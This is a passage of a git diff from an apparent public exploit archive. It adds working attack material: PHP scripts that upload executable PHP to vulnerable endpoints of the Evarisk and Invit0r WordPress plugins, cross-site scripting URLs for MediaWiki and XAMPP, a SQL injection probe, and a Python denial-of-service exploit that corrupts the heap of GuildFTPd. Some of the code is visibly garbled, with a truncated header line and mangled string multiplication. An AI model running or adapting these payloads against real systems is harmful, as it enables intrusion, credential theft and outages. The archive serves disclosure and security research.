vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible. + +Evarisk 5.1.5.4 is vulnerable; other versions may also be affected. + +<?php + +$headers = array("Content-Type: application/octet-stream"); + +$uploadfile="<?php phpinfo(); ?>"; + +$ch = curl_init("http://www.example.com/wordpress/wp-content/plugins/evarisk/include/lib/actionsCorrectives/activite/uploadPhotoApres.php?qqfile=lo.php"); +curl_setopt($ch, CURLOPT_POST, true); +curl_setopt($ch, CURLOPT_POSTFIELDS, @$uploadfile); +curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); +curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); +$postResult = curl_exec($ch); +curl_close($ch); +print "$postResult"; + +?> diff --git a/platforms/php/webapps/37403.php b/platforms/php/webapps/37403.php new file mode 100755 index 000000000..13b56583e --- /dev/null +++ b/platforms/php/webapps/37403.php @@ -0,0 +1,22 @@ +source: http://www.securityfocus.com/bid/53995/info + +Invit0r plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input. + +An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible. + +Invit0r 0.22 is vulnerable; other versions may also be affected. + +ders = array("Content-Type: application/octet-stream"); + +$uploadfile="<?php phpinfo(); ?>"; + +$ch = curl_init("http://www.example.com/wordpress/wp-content/plugins/invit0r/lib/php-ofc-library/ofc_upload_image.php?name=lo.php"); +curl_setopt($ch, CURLOPT_POST, true); +curl_setopt($ch, CURLOPT_POSTFIELDS, @$uploadfile); +curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); +curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); +$postResult = curl_exec($ch); +curl_close($ch); +print "$postResult"; + +?> diff --git a/platforms/php/webapps/37404.txt b/platforms/php/webapps/37404.txt new file mode 100755 index 000000000..a7a6bee28 --- /dev/null +++ b/platforms/php/webapps/37404.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/53998/info + +MediaWiki is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +MediaWiki versions prior to 1.17.5, 1.18.4, and 1.19.1 are vulnerable. + +http://www.example.com/wiki/Main_Page?uselang=a%27%20onmouseover=eval(alert(1))%20e=%27 \ No newline at end of file diff --git a/platforms/windows/dos/6738.py b/platforms/windows/dos/6738.py index 51747aaa3..8356a9df6 100755 --- a/platforms/windows/dos/6738.py +++ b/platforms/windows/dos/6738.py @@ -1,55 +1,55 @@ -# GuildFTPd v0.999.8.11/v0.999.14 heap corruption PoC/DoS exploit -# GuildFTPd URL - http://www.guildftpd.com -# cwd/list heap corruption -# overwrite registers in free(): ecx, edi -# -# (x)dmnt 2008 -# feel free to do shellcode -# -- coding: windows-1252 -- - -import socket -import sys, time - -evil_cwd = "/."124 -evil_dir = "X"100 - -def help_info(): - print ("Usage: guildd0s <host> <login> <password>\n") - print ("Note: anonymous is enought\n") - -def dos_it(hostname, username, passwd): - sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - try: - sock.connect((hostname, 21)) - except: - print ("[-] Connection error!") - sys.exit(1) - r=sock.recv(1024) - print "[+] " + r - sock.send("user %s\n" %username) - r=sock.recv(1024) - sock.send("pass %s\n" %passwd) - r=sock.recv(1024) - print "[+] Send evil string" - sock.send("cwd %s\n" %evil_cwd) - r=sock.recv(1024) - sock.send("list %s\r\n" %evil_dir) - time.sleep(3) - sock.close() - print "[!] Now server d0s'ed/heap corrupted" - -print ("\n]GuildFTPd v0.999.8.11/v0.999.14 remote heap corruption PoC/DoS exploit[") -print ("](x)dmnt 2008[\n\n") - -if len(sys.argv) <> 4: - help_info() - sys.exit(1) - -else: - hostname=sys.argv[1] - username=sys.argv[2] - passwd=sys.argv[3] - dos_it(hostname,username,passwd) - sys.exit(0) - -# milw0rm.com [2008-10-12] +# GuildFTPd v0.999.8.11/v0.999.14 heap corruption PoC/DoS exploit +# GuildFTPd URL - http://www.guildftpd.com +# cwd/list heap corruption +# overwrite registers in free(): ecx, edi +# +# (x)dmnt 2008 +# feel free to do shellcode +# -- coding: windows-1252 -- + +import socket +import sys, time + +evil_cwd = "/."124 +evil_dir = "X"100 + +def help_info(): + print ("Usage: guildd0s <host> <login> <password>\n") + print ("Note: anonymous is enought\n") + +def dos_it(hostname, username, passwd): + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + try: + sock.connect((hostname, 21)) + except: + print ("[-] Connection error!") + sys.exit(1) + r=sock.recv(1024) + print "[+] " + r + sock.send("user %s\n" %username) + r=sock.recv(1024) + sock.send("pass %s\n" %passwd) + r=sock.recv(1024) + print "[+] Send evil string" + sock.send("cwd %s\n" %evil_cwd) + r=sock.recv(1024) + sock.send("list %s\r\n" %evil_dir) + time.sleep(3) + sock.close() + print "[!] Now server d0s'ed/heap corrupted" + +print ("\n]GuildFTPd v0.999.8.11/v0.999.14 remote heap corruption PoC/DoS exploit[") +print ("](x)dmnt 2008[\n\n") + +if len(sys.argv) <> 4: + help_info() + sys.exit(1) + +else: + hostname=sys.argv[1] + username=sys.argv[2] + passwd=sys.argv[3] + dos_it(hostname,username,passwd) + sys.exit(0) + +# milw0rm.com [2008-10-12] diff --git a/platforms/windows/remote/37396.txt b/platforms/windows/remote/37396.txt new file mode 100755 index 000000000..d2f059cbd --- /dev/null +++ b/platforms/windows/remote/37396.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/53979/info + +XAMPP for Windows is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities. + +Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/xampp/perlinfo.pl/"<script>alert("XSS")</script> + +http://www.example.com/xampp/cds.php/%27onmouseover=alert%28%22XSS%22%29%3E + +http://www.example.com/xampp/cds.php?interpret=1&jahr=1967 and sleep(1) &titel=555-666-0606 \ No newline at end of file